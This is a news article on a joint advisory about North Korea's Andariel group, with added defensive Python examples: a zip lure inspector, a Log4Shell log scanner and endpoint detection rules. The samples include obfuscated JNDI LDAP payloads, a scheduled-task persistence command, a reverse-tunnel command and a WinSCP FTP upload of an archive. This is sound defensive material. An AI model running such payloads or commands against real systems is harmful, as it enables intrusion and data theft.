Global security agencies issued a cybersecurity advisory on Thursday, highlighting cyber espionage activities linked to the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau, located in Pyongyang and Sinuiju. The bureau includes a state-sponsored cyber group tracked as Andariel and also known as Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. The group primarily targets the defense, aerospace, nuclear, and engineering sectors to acquire sensitive, classified technical information and intellectual property. These activities are aimed at advancing the DPRK’s military and nuclear capabilities.
“The actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation,” according to the advisory issued by the U.S. Federal Bureau of Investigation (FBI), Cyber National Mission Force (CNMF), Cybersecurity and Infrastructure Security Agency (CISA), Department of Defense Cyber Crime Center (DC3), National Security Agency (NSA), the Republic of Korea’s National Intelligence Service (NIS) and National Police Agency (NPA), and the U.K.’s National Cyber Security Centre (NCSC).
The advisory says the actors then “employ standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and perform privilege escalation using common credential-stealing tools such as Mimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration.”
Additionally, the agencies “believe the group and the cyber techniques remain an ongoing threat to various industry sectors worldwide, including but not limited to entities in their respective countries, as well as in Japan and India. RGB 3rd Bureau actors fund their espionage activity through ransomware operations against U.S. healthcare entities.”
The Andariel hackers also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.
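The zip-wrapped LNK/HTA lure described above can be triaged at the mail gateway without extracting anything: a zip's central directory exposes member names and, per entry, whether the entry is encrypted, so even a password-protected archive reveals what it carries. The following is an added example, not code from the advisory or from any of the authoring agencies; the sample archives are constructed in memory with a hand-rolled minimal zip writer (Python's zipfile cannot write the encryption flag), and the extension list is an assumption based on the file types the advisory names.

```python
"""Added example (not from the advisory): flag zip attachments that carry
LNK or HTA members, including inside password-protected archives.
Sample archives are constructed in memory; no real lures are used."""
import io
import struct
import zipfile
import zlib

# Assumption: lure payloads are identified by the final extension, case-insensitively.
SUSPICIOUS_EXT = {".lnk", ".hta"}


def inspect_zip(data):
    """Return {'is_zip', 'suspicious', 'findings'} for one attachment.

    Only the central directory is read; no member is ever extracted, so an
    encrypted archive still yields its member names and encryption state."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"is_zip": False, "suspicious": False, "findings": []}
    findings = []
    with zf:
        for info in zf.infolist():
            name = info.filename
            parts = name.lower().rsplit(".", 1)
            ext = "." + parts[1] if len(parts) == 2 else ""
            if ext not in SUSPICIOUS_EXT:
                continue
            findings.append({
                "member": name,
                "ext": ext,
                # General-purpose bit 0 marks an encrypted entry (ZIP APPNOTE 4.4.4).
                "encrypted": bool(info.flag_bits & 0x1),
                # "report.pdf.lnk"-style double extensions are a common lure shape.
                "double_ext": name.lower().count(".") >= 2,
            })
    return {"is_zip": True, "suspicious": bool(findings), "findings": findings}


def build_zip(members, encrypted=False):
    """Constructed sample writer: minimal stored (uncompressed) zip.

    Sets general-purpose bit 0 when encrypted=True so inspect_zip sees an
    encrypted entry; member bytes are left as plaintext since nothing here
    decrypts them (only the directory flag matters to the check above)."""
    flags = 0x1 if encrypted else 0
    local, central = b"", b""
    for name, data in members.items():
        fname = name.encode()
        crc = zlib.crc32(data) & 0xFFFFFFFF
        offset = len(local)
        # Local file header: sig, version needed, flags, method, time, date,
        # crc, compressed size, uncompressed size, name length, extra length.
        local += struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, 0, 0, 0x21,
                             crc, len(data), len(data), len(fname), 0) + fname + data
        # Central directory header for the same entry (0x21 = 1980-01-01).
        central += struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, 0,
                               0, 0x21, crc, len(data), len(data), len(fname),
                               0, 0, 0, 0, 0, offset) + fname
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, len(members), len(members),
                       len(central), len(local), 0)
    return local + central + eocd


if __name__ == "__main__":
    lure = build_zip({"Job_Description.pdf.lnk": b"L\x00\x00\x00 constructed"})
    print(inspect_zip(lure))
    locked = build_zip({"invite.hta": b"<script>constructed</script>"}, encrypted=True)
    print(inspect_zip(locked))
```

The check deliberately works from metadata alone: an encrypted archive cannot be scanned for content at the gateway, but the combination of an encrypted entry and a `.lnk` or `.hta` member name is by itself enough to quarantine the message for review.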
The advisory added that, in some instances, the agencies have observed the actors launching ransomware attacks and conducting cyber espionage operations on the same day, or leveraging ransomware and cyber espionage against the same entity.
“The actors gain initial access through widespread exploitation of web servers through known vulnerabilities, such as CVE-2021-44228 (Log4Shell) in Apache’s Log4j software library and other CVEs listed above [in the advisory], to deploy web shells and gain access to sensitive information and applications for further exploitation,” the advisory noted. “The actors continue to breach organizations by exploiting web server vulnerabilities in public-facing devices and have conducted widespread activity against a number of different organizations simultaneously.”
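Because the initial access described above is mass exploitation of public-facing servers, the first place a defender can see it is the web server's own access log. The following is an added example, not code from the advisory: it scans constructed Apache-style log lines for CVE-2021-44228 probes in the request line, Referer and User-Agent, and resolves the URL-encoding and nested-lookup obfuscation (`${${lower:j}ndi:…}`, `${::-j}`, `${env:X:-j}`) that was widely used to evade naive `${jndi:` string matches. The log lines and the addresses in them (documentation ranges) are constructed samples.

```python
"""Added example (not from the advisory): surface Log4Shell probes in access
logs by normalizing Log4j lookup obfuscation before matching on 'jndi:'.
Sample log lines are constructed; addresses come from documentation ranges."""
import re
from urllib.parse import unquote

# Apache/nginx "combined" format; only the fields an attacker controls are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')
# A lookup whose body contains no further "${" (i.e. an innermost one).
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Resolved jndi lookups are prefixed with a NUL sentinel so they are not rewritten again.
JNDI_HIT = re.compile(r"\x00(jndi:[^\x00\s]+)", re.IGNORECASE)


def normalize(value, max_rounds=20):
    """Percent-decode (twice, for double-encoded payloads) and then resolve
    nested lookups innermost-first until a literal 'jndi:' prefix surfaces.
    Unknown lookups collapse to their body, which cannot hide a payload."""
    s = unquote(unquote(value))

    def resolve(m):
        body = m.group(1)
        low = body.lower()
        if low.startswith("jndi:"):
            return "\x00" + body
        if low.startswith("lower:"):
            return body[6:].lower()
        if low.startswith("upper:"):
            return body[6:].upper()
        if ":-" in body:  # ${env:NaN:-j} and ${::-j} both evaluate to the default "j"
            return body.rsplit(":-", 1)[1]
        return body

    for _ in range(max_rounds):
        new = INNER_LOOKUP.sub(resolve, s)
        if new == s:
            break
        s = new
    return s


def find_jndi(value):
    """Return the resolved jndi payloads hidden in one header or request value."""
    return JNDI_HIT.findall(normalize(value))


def scan_log(lines):
    """Return one hit per (line, field) whose value resolves to a jndi lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("req", "ref", "ua"):
            for payload in find_jndi(m.group(field)):
                hits.append({"line": n, "src": m.group("ip"), "field": field, "payload": payload})
    return hits


SAMPLE_LOG = [  # constructed sample lines
    '203.0.113.5 - - [25/Jul/2024:10:15:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [25/Jul/2024:10:15:02 +0000] "GET /api/status HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://198.51.100.10:1389/a}"',
    '203.0.113.5 - - [25/Jul/2024:10:15:03 +0000] "GET /login?user=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap'
    '%3A%2F%2F198.51.100.10%2Fx%7D HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [25/Jul/2024:10:15:04 +0000] "GET /api/status HTTP/1.1" 200 88 '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.10/y}" "curl/8.0"',
    '198.51.100.77 - - [25/Jul/2024:10:16:00 +0000] "GET /search?q=${user.name} HTTP/1.1" 200 1400 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A log hit only shows the probe, not whether Log4j evaluated it; the confirming signal is the outbound LDAP/RMI connection from the server to the address in the payload, which is why the resolved payload, not just the matched line, is what the scanner returns.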
The Andariel actors are well-versed in using native tools and processes on systems, known as living off the land (LOTL). They use Windows command line, PowerShell, Windows Management Instrumentation command-line (WMIC), and Linux bash for system, network, and account enumeration. They also often make typos and other mistakes, indicating that the commands are not directly copied from a playbook and the actors have a flexible and impromptu approach.
“The actors used customized file system enumeration tooling written in .NET. The tool is capable of receiving and executing command line arguments to enumerate directories and files and compress output files,” according to the advisory. “The tool collects the following information for each drive targeted on a system: depth relative to starting path, name, last write time, last access time, creation time, size, and attributes. The actors also enumerate directories and files of connected devices using Server Message Block (SMB) protocol, which enables network file sharing and the ability to request services and programs from a network.”
Additionally, the Andariel actors log user activity on compromised hosts for discovery and use RDP for lateral movement. “The group logs active window changes, clipboard data, and keystrokes and saves the collected logging information to the ‘%Temp%’ directory. The actors have also used Remote Desktop Protocol (RDP) to move laterally.”
The advisory also found that Andariel hackers leverage techniques and infrastructure positioned around the world to send commands to compromised systems. “The actors disguise their malware within HTTP packets to appear as benign network traffic. They also use tunneling tools such as 3Proxy, PLINK, and Stunnel as well as custom proxy tunneling tools to tunnel traffic over a variety of protocols from inside a network back to a C2 server. Tunneling enables the actors to perform C2 operations despite network configurations that would typically pose a challenge, such as the use of Network Address Translation (NAT) or traffic funneled through a web proxy,” it added.
Malware previously used by the Andariel actors enabled them to search through files that could be of interest, including scanning computer files for keywords related to the defense and military sectors in English and Korean. The actors identify data for theft by enumerating files and folders across many directories and servers using command-line activity or functionality built into custom tools. The actors collect the relevant files into RAR archives, sometimes using a version of WinRAR brought into the victim’s environment with other malicious tooling.
Furthermore, the actors typically exfiltrate data to web services such as cloud storage or servers not associated with their primary C2. Notably, the actors have been observed logging into actor-controlled cloud-based storage service accounts directly from victim networks to exfiltrate data. The Andariel actors have also been observed using the utilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP) and other protocols.
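The post-exploitation tradecraft in the passages above (living-off-the-land enumeration with typo-prone commands, scheduled-task persistence, 3Proxy/PLINK/Stunnel tunneling, RAR collection followed by PuTTY/WinSCP transfer) is visible in endpoint process-creation telemetry, which is what the advisory's "monitor endpoints" recommendation comes down to. The following is an added example, not code from the advisory or any of the authoring agencies: it runs four detections over constructed process-creation events. The event field names, hosts, paths and thresholds are assumptions; the tool names are those the advisory lists, and the reverse-forward rule is this example's own addition for catching a renamed PLINK binary by its command-line syntax.

```python
"""Added example (not from the advisory): detections over constructed Windows
process-creation events for discovery bursts, scheduled-task persistence,
tunneling tools, and archive-then-transfer sequences. Hosts, paths and the
event schema {ts, host, image, cmdline} are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath
import re

ENUM_BINARIES = {"whoami.exe", "net.exe", "net1.exe", "nltest.exe", "wmic.exe",
                 "tasklist.exe", "systeminfo.exe", "ipconfig.exe", "netstat.exe",
                 "arp.exe", "quser.exe", "hostname.exe", "dsquery.exe"}
TUNNEL_TOOLS = {"3proxy.exe", "plink.exe", "stunnel.exe"}
ARCHIVERS = {"rar.exe", "winrar.exe"}
TRANSFER_TOOLS = {"winscp.exe", "putty.exe", "pscp.exe", "psftp.exe", "ftp.exe"}
# plink/ssh reverse port forward ("-R <port>:<host>:<port>") survives renaming the binary.
REVERSE_FWD = re.compile(r"(?<!\S)-R\s+\d+:\S+:\d+")


def base(ev):
    return ntpath.basename(ev["image"]).lower()


def ts(ev):
    return datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S")


def detect(events, enum_threshold=4, enum_window=timedelta(minutes=10),
           exfil_window=timedelta(minutes=60)):
    """Return a list of {'rule', 'host', 'evidence'} alerts."""
    alerts = []
    by_host = defaultdict(list)
    for ev in sorted(events, key=ts):
        by_host[ev["host"]].append(ev)
    for host, evs in by_host.items():
        # Rule 1: several distinct discovery binaries inside a short window. Matching on
        # the image name rather than the full command tolerates typos such as "net grop".
        enum = [e for e in evs if base(e) in ENUM_BINARIES]
        for i, first in enumerate(enum):
            seen = {base(e) for e in enum[i:] if ts(e) - ts(first) <= enum_window}
            if len(seen) >= enum_threshold:
                alerts.append({"rule": "discovery_burst", "host": host, "evidence": sorted(seen)})
                break
        for e in evs:
            # Rule 2: scheduled task creation (the persistence mechanism the advisory names).
            if base(e) == "schtasks.exe" and "/create" in e["cmdline"].lower():
                alerts.append({"rule": "scheduled_task_persistence", "host": host, "evidence": e["cmdline"]})
            # Rule 3: known tunneling tools, or reverse-forward syntax under any image name.
            if base(e) in TUNNEL_TOOLS or REVERSE_FWD.search(e["cmdline"]):
                alerts.append({"rule": "tunneling_tool", "host": host, "evidence": e["cmdline"]})
        # Rule 4: archive creation followed, on the same host, by a transfer utility.
        for a in (e for e in evs if base(e) in ARCHIVERS):
            for t in (e for e in evs if base(e) in TRANSFER_TOOLS):
                if timedelta(0) <= ts(t) - ts(a) <= exfil_window:
                    alerts.append({"rule": "archive_then_transfer", "host": host,
                                   "evidence": [a["cmdline"], t["cmdline"]]})
                    break
    return alerts


def ev(t, host, image, cmdline):
    return {"ts": t, "host": host, "image": image, "cmdline": cmdline}


SAMPLE_EVENTS = [  # constructed; hosts, paths and addresses are invented
    ev("2024-07-25 10:02:11", "WS-ENG-07", r"C:\Windows\System32\whoami.exe", "whoami /all"),
    ev("2024-07-25 10:02:40", "WS-ENG-07", r"C:\Windows\System32\net.exe", "net user /domain"),
    ev("2024-07-25 10:03:05", "WS-ENG-07", r"C:\Windows\System32\net.exe", 'net grop "domain admins" /domain'),
    ev("2024-07-25 10:03:30", "WS-ENG-07", r"C:\Windows\System32\nltest.exe", "nltest /dclist:"),
    ev("2024-07-25 10:04:12", "WS-ENG-07", r"C:\Windows\System32\wbem\WMIC.exe", "wmic process list brief"),
    ev("2024-07-25 10:05:00", "WS-ENG-07", r"C:\Windows\System32\tasklist.exe", "tasklist /v"),
    ev("2024-07-25 10:20:00", "WS-ENG-07", r"C:\Windows\System32\schtasks.exe",
       r'schtasks /create /tn "Update" /tr C:\Windows\Temp\up.exe /sc minute /mo 5'),
    ev("2024-07-25 11:00:00", "WS-ENG-07", r"C:\Windows\Temp\svc.exe",
       "svc.exe -N -R 8443:127.0.0.1:3389 ops@198.51.100.10"),
    ev("2024-07-25 11:30:00", "WS-ENG-07", r"C:\Windows\Temp\rar.exe",
       r'rar.exe a -r -hp C:\Windows\Temp\d.rar "C:\Projects\*.docx"'),
    ev("2024-07-25 11:45:00", "WS-ENG-07", r"C:\Program Files\WinSCP\WinSCP.exe",
       r'WinSCP.exe /command "open ftp://u@198.51.100.20" "put C:\Windows\Temp\d.rar"'),
    ev("2024-07-25 09:00:00", "FS-01", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ev("2024-07-25 09:30:00", "FS-01", r"C:\Windows\System32\tasklist.exe", "tasklist"),
    ev("2024-07-25 09:40:00", "FS-01", r"C:\Program Files\WinRAR\WinRAR.exe",
       r"WinRAR.exe a C:\Backups\weekly.rar C:\Shares\Finance"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The second host in the sample shows the tuning problem: a lone backup job or two admin commands should not fire, so the discovery rule counts distinct binaries in a window rather than single commands, and the exfiltration rule requires the archive and the transfer tool to appear in sequence on the same host.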
The authoring agencies encourage critical infrastructure organizations to promptly apply vulnerability patches, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections. While the targeting is not exclusive, entities involved in or associated with the defense, aerospace, nuclear, and engineering sectors should remain vigilant in defending their networks from North Korean state-sponsored cyber operations.
